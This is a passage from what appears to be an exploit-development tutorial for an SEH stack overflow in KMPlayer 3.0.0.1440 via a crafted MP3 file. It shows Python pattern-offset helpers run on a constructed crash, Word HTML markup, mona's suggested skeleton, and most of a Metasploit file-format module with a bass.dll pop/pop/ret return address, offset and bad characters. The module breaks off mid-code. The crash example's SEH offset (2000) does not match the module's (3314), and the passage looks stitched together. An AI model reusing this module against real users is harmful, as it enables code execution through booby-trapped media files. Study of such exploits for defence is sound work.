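    stored little-endian in memory, so 0x68423368 was the bytes b'h3Bh'."""
    if isinstance(value, int):
        return value.to_bytes(width, "little")
    if isinstance(value, str):
        return value.encode()
    return bytes(value)


def pattern_offset(value, width: int = 4) -> Optional[dict]:
    """Find where `value` lies in the pattern, as pattern_offset / mona findmsp do.

    Returns {'offset': n, 'match': 'exact' | 'reversed'} or None when the value
    does not come from the pattern at all. A 'reversed' hit means the bytes were
    read in the opposite byte order (e.g. a big-endian rendering of the dword).
    """
    needle = _as_bytes(value, width)
    pat = pattern_create(PERIOD)  # search the whole period, not just what was sent
    n = pat.find(needle)
    if n >= 0:
        return {"offset": n, "match": "exact"}
    n = pat.find(needle[::-1])
    if n >= 0:
        return {"offset": n, "match": "reversed"}
    return None


def triage_crash(registers: dict) -> dict:
    """Map each register / SEH field captured at the crash to its buffer offset.

    `registers` is {name: value}; fields the pattern never reached map to None,
    which tells you that field was not under the input's control."""
    return {name: pattern_offset(val) for name, val in registers.items()}


# Constructed crash state (hypothetical, not taken from a real KMPlayer crash):
# the values a debugger would show after sending pattern_create(5000) when the
# buffer overwrites the return address as well as the SEH record.
CONSTRUCTED_CRASH = {
    "EIP": 0x68423368,   # bytes b'h3Bh' -> offset 1000
    "nSEH": 0x6F43356F,  # bytes b'o5Co' -> offset 1996
    "SEH": 0x376F4336,   # bytes b'6Co7' -> offset 2000
    "EBX": 0x00000000,   # not from the pattern -> None
}

if __name__ == "__main__":
    for reg, hit in triage_crash(CONSTRUCTED_CRASH).items():
        print(reg, hit)
```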
<!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <br />
<div class="MsoListParagraph" style="margin-left: 0.25in; text-indent: -0.25in;"><b>3. Crafting the Metasploit module</b></div><div class="MsoNormal"><br />
</div><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt;">Running </span><span style="background: #BFBFBF; font-family: "Courier New"; font-size: 8.0pt;">!mona suggest</span><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt;"> against the crash produces the following skeleton for an SEH-based exploit. The <b>Ret</b> value it proposes is the pop/pop/ret address mona selected; the Seh mixin uses it to return execution into the overwritten nSEH field:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Metasploit 'include' section :</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-----------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># Don't forget to include the SEH mixin!</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">include Msf::Exploit::Seh</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Metasploit 'Targets' section :</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">'Targets' =></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">  [ '&lt;fill in the OS/app version here&gt;',</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">    {</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">      'Ret'    => 0x1101dd36,</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">      'Offset' => 3314</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">    }</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">  ], # pop esi # pop ebx # ret 10 - bass.dll</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">],</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Metasploit 'exploit' section :</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-----------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">def exploit</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">  buffer = rand_text(target['Offset'])  # junk up to the SEH record</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">  buffer &lt;&lt; generate_seh_record(target.ret)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">  buffer &lt;&lt; make_nops(30)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">  buffer &lt;&lt; payload.encoded  # 1652 bytes of space</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end</span><br />
<br />
Based on the above suggestion, I have crafted the following Metasploit module for KMPlayer SEH exploitation.<br />
<div class="MsoNormal"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">require 'msf/core'</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">class Metasploit3 < Msf::Exploit::Remote</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span><span style="mso-spacerun: yes;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span>include Msf::Exploit::FILEFORMAT</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span>include Msf::Exploit::Seh</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span>def initialize(info = {})</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>super(update_info(info,</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Name'<span style="mso-spacerun: yes;"> </span>=> 'The KMPlayer 3.0.0.1440 .mp3 SEH exploit module',</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Description'<span style="mso-spacerun: yes;"> </span>=> %q{</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 5;"> </span>This module exploits a stack buffer overflow in The KMPlayer 3.0.0.1440. When opening a specially crafted MP3 file (.mp3) in the application, the SEH handler will be overwritten.</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> 
</span>},</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Author'<span style="mso-spacerun: yes;"> </span>=></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>[</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 4;"> </span>'AMol Naik'<span style="mso-spacerun: yes;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>],</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Version'<span style="mso-spacerun: yes;"> </span>=> 'Version 1.0',</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span><span style="mso-tab-count: 
2;"> </span>'References'<span style="mso-spacerun: yes;"> </span>=></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span><span style="mso-tab-count: 1;"> </span>[</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span><span style="mso-tab-count: 1;"> </span><span style="mso-tab-count: 1;"> </span>["URL", "http://www.exploit-db.com/exploits/17383"],</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 4;"> </span>["URL", "http://www.exploit-db.com/exploits/17364"],</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span><span style="mso-tab-count: 1;"> </span>],</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'DefaultOptions' =></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>{</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; 
mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 4;"> </span>'EXITFUNC' => 'process',</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>},</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Payload'<span style="mso-spacerun: yes;"> </span>=></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>{</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Space'<span style="mso-spacerun: yes;"> </span>=> 5000,<span style="mso-spacerun: yes;"> </span>#could be more, but this is enough</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'DisableNops' =><span style="mso-spacerun: yes;"> </span>'True',</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'BadChars'<span style="mso-spacerun: yes;"> 
</span>=> "\x00\x0a\x0d",</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>},</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Platform' => 'win',</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Targets'<span style="mso-spacerun: yes;"> </span>=></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>[</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 4;"> </span>[</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 5;"> </span>'Windows XP SP3 English VMware',</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 5;"> </span>{</span></div><div class="MsoNormal" style="background: #BFBFBF; 
mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 4;"> </span><span style="mso-tab-count: 1;"> </span>'Offset' => 3314,</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 5;"> </span>'Ret'<span style="mso-spacerun: yes;"> </span>=> 0x1101dd36,<span style="mso-spacerun: yes;"> </span># pop esi # pop ebx # ret 10 - bass.dll</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 5;"> </span>}</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 4;"> </span>],</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>],</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>'Privileged'<span style="mso-spacerun: yes;"> </span>=> false,</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> 
</span>'DefaultTarget'<span style="mso-spacerun: yes;"> </span>=> 0))</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>register_options(</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>[</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 3;"> </span>OptString.new('FILENAME', [ true, 'mp3 file',<span style="mso-spacerun: yes;"> </span>'msf.mp3']),</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span 